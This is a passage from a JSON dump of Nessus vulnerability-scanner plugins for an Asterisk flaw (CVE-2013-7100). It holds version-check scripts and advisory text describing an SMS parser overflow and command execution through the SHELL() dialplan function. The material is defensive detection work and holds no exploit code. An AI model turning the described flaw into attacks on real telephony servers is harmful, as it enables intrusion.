Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-addons-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-devel-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-firmware-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-gui-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-alsa-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-calendar-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-cel-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-corosync-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-curl-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-dahdi-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-fax-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-festival-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ices-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jabber-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jack-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ldap-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-lua-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-minivm-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mobile-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mp3-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mysql-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ooh323-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-osp-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-oss-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pgsql-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pktccops-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-portaudio-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-radius-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-saycountpl-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-skinny-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-snmp-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-speex-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-sqlite-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-tds-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-unistim-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-imap-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-plain-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64asteriskssl1-11.7.0-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T15:02:49", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by the following vulnerabilities :\n\n - A denial of service vulnerability exists in the 'unpacksms16()' function of the 'app_sms.c' source file.\n When a 16-bit SMS message with an unusual message length value is received, an infinite loop will be created, causing a denial of service.\n\n - A privilege escalation vulnerability exists because of the way dialplan functions are handled during variable substitution. Privileged dialplan functions, such as the SHELL() and FILE() functions, can be used by external control protocols, such as the Asterisk Manager Interface and Asterisk Gateway Interface. A malicious, authenticated user could use these functions to modify arbitrary files or execute arbitrary commands.", "cvss3": {}, "published": "2013-12-19T00:00:00", "type": "nessus", "title": "Asterisk Multiple Vulnerabilities (AST-2013-006 / AST-2013-007)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_007.NASL", "href": "https://www.tenable.com/plugins/nessus/71538", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71538);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-7100\");\n script_bugtraq_id(64364, 64367);\n\n script_name(english:\"Asterisk Multiple Vulnerabilities (AST-2013-006 / AST-2013-007)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by the following\nvulnerabilities :\n\n - A denial of service vulnerability exists in the\n 'unpacksms16()' function of the 'app_sms.c' source file.\n When a 16-bit SMS message with an unusual message length\n value is received, an infinite loop will be created,\n causing a denial of service.\n\n - A privilege escalation vulnerability exists because of\n the way dialplan functions are handled during variable\n substitution. Privileged dialplan functions, such as\n the SHELL() and FILE() functions, can be used by\n external control protocols, such as the Asterisk Manager\n Interface and Asterisk Gateway Interface. A malicious,\n authenticated user could use these functions to modify\n arbitrary files or execute arbitrary commands.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-006.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-007.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22590\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22905\");\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-1.8.24.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5269580c\");\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.4.2\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?989ff925\");\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-11.6.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f8ef69c\");\n # http://downloads.asterisk.org/pub/telephony/certified-asterisk/releases/ChangeLog-1.8.15-cert4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b1df629a\");\n # http://downloads.asterisk.org/pub/telephony/certified-asterisk/releases/ChangeLog-11.2-cert3\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60d42add\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.24.1 / 10.12.4 / 11.6.1 / Certified Asterisk\n1.8.15-cert4 / 11.2-cert3, or apply the appropriate patches or\nworkaround contained in the Asterisk advisories.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-7100\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/19\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 10x < 10.12.4\n if (version =~ \"^10([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"10.12.4\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 11x < 11.6.1\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.6.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.x < 1.8.24.1\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"1.8.24.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.15-cert4\n if (version =~ \"^1\\.8\\.15([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert4\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 11.2.x < 11.2-cert3\n if (version =~ \"^11\\.2([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"11.2-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T15:02:50", "description": "The Asterisk project reports :\n\nA 16 bit SMS message that contains an odd message length value will cause the message decoding loop to run forever. The message buffer is not on the stack but will be overflowed resulting in corrupted memory and an immediate crash.\n\nExternal control protocols, such as the Asterisk Manager Interface, often have the ability to get and set channel variables; this allows the execution of dialplan functions. Dialplan functions within Asterisk are incredibly powerful, which is wonderful for building applications using Asterisk. But during the read or write execution, certain diaplan functions do much more. For example, reading the SHELL() function can execute arbitrary commands on the system Asterisk is running on. Writing to the FILE() function can change any file that Asterisk has write access to. When these functions are executed from an external protocol, that execution could result in a privilege escalation.", "cvss3": {}, "published": "2013-12-18T00:00:00", "type": "nessus", "title": "FreeBSD : asterisk -- multiple vulnerabilities (0c39bafc-6771-11e3-868f-0025905a4771)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:asterisk10", "p-cpe:/a:freebsd:freebsd:asterisk11", "p-cpe:/a:freebsd:freebsd:asterisk18", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0C39BAFC677111E3868F0025905A4771.NASL", "href": "https://www.tenable.com/plugins/nessus/71506", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71506);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7100\");\n\n script_name(english:\"FreeBSD : asterisk -- multiple vulnerabilities (0c39bafc-6771-11e3-868f-0025905a4771)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk project reports :\n\nA 16 bit SMS message that contains an odd message length value will\ncause the message decoding loop to run forever. The message buffer is\nnot on the stack but will be overflowed resulting in corrupted memory\nand an immediate crash.\n\nExternal control protocols, such as the Asterisk Manager Interface,\noften have the ability to get and set channel variables; this allows\nthe execution of dialplan functions. Dialplan functions within\nAsterisk are incredibly powerful, which is wonderful for building\napplications using Asterisk. But during the read or write execution,\ncertain diaplan functions do much more. For example, reading the\nSHELL() function can execute arbitrary commands on the system Asterisk\nis running on. Writing to the FILE() function can change any file that\nAsterisk has write access to. When these functions are executed from\nan external protocol, that execution could result in a privilege\nescalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-006.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-007.pdf\"\n );\n # https://www.asterisk.org/security\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.asterisk.org/downloads/security-advisories\"\n );\n # https://vuxml.freebsd.org/freebsd/0c39bafc-6771-11e3-868f-0025905a4771.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f6d7329d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk18\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk10<10.12.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk11<11.6.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk18<1.8.24.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-18T14:26:45", "description": "- Sat Dec 28 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.7.0-1 :\n\n - The Asterisk Development Team has announced the release of Asterisk 11.7.0.\n\n - This release is available for immediate download at\n\n - http://downloads.asterisk.org/pub/telephony/asterisk\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-01-09T00:00:00", "type": "nessus", "title": "Fedora 18 : asterisk-11.7.0-1.fc18 (2013-24142)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-24142.NASL", "href": "https://www.tenable.com/plugins/nessus/71871", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-24142.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71871);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7100\");\n script_xref(name:\"FEDORA\", value:\"2013-24142\");\n\n script_name(english:\"Fedora 18 : asterisk-11.7.0-1.fc18 (2013-24142)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Sat Dec 28 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.7.0-1 :\n\n - The Asterisk Development Team has announced the\n release of Asterisk 11.7.0.\n\n - This release is available for immediate download at\n\n - http://downloads.asterisk.org/pub/telephony/asterisk\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1043917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1043918\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125875.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?08195ef2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"asterisk-11.7.0-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-18T14:26:47", "description": "Jan Juergens discovered a buffer overflow in the parser for SMS messages in Asterisk.\n\nAn additional change was backported, which is fully described in http://downloads.asterisk.org/pub/security/AST-2013-007.html\n\nWith the fix for AST-2013-007, a new configuration option was added in order to allow the system administrator to disable the expansion of'dangerous' functions (such as SHELL()) from any interface which is not the dialplan. In stable and oldstable this option is disabled by default. To enable it add the following line to the section '[options]' in /etc/asterisk/asterisk.conf (and restart asterisk)\n\nlive_dangerously = no", "cvss3": {}, "published": "2014-01-08T00:00:00", "type": "nessus", "title": "Debian 